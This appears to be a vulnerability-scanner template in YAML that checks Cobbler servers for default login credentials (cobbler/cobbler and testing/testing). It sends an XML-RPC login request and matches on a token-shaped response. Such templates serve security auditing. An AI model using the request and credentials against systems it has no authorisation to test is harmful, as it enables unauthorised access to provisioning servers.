73 lines
1.7 KiB
YAML
73 lines
1.7 KiB
YAML
id: cobbler-default-login
|
|
|
|
info:
|
|
name: Cobbler Default Login
|
|
author: c-sh0
|
|
severity: high
|
|
description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
|
|
reference:
|
|
- https://seclists.org/oss-sec/2022/q1/146
|
|
- https://github.com/cobbler/cobbler/issues/2307
|
|
- https://github.com/cobbler/cobbler/issues/2909
|
|
classification:
|
|
cwe-id: CWE-798
|
|
tags: cobbler,default-login,api
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/xml
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
<?xml version='1.0'?>
|
|
<methodCall>
|
|
<methodName>login</methodName>
|
|
<params>
|
|
<param>
|
|
<value>
|
|
<string>{{username}}</string>
|
|
</value>
|
|
</param>
|
|
<param>
|
|
<value>
|
|
<string>{{password}}</string>
|
|
</value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
username:
|
|
- cobbler
|
|
- testing
|
|
password:
|
|
- cobbler
|
|
- testing
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/xml'
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- "!contains(tolower(body), '<name>faultCode</name>')"
|
|
- "!contains(tolower(body), 'login failed')"
|
|
condition: or
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "(.*[a-zA-Z0-9].+==)</string></value>"
|
|
|
|
# Enhanced by mp on 2022/03/03
|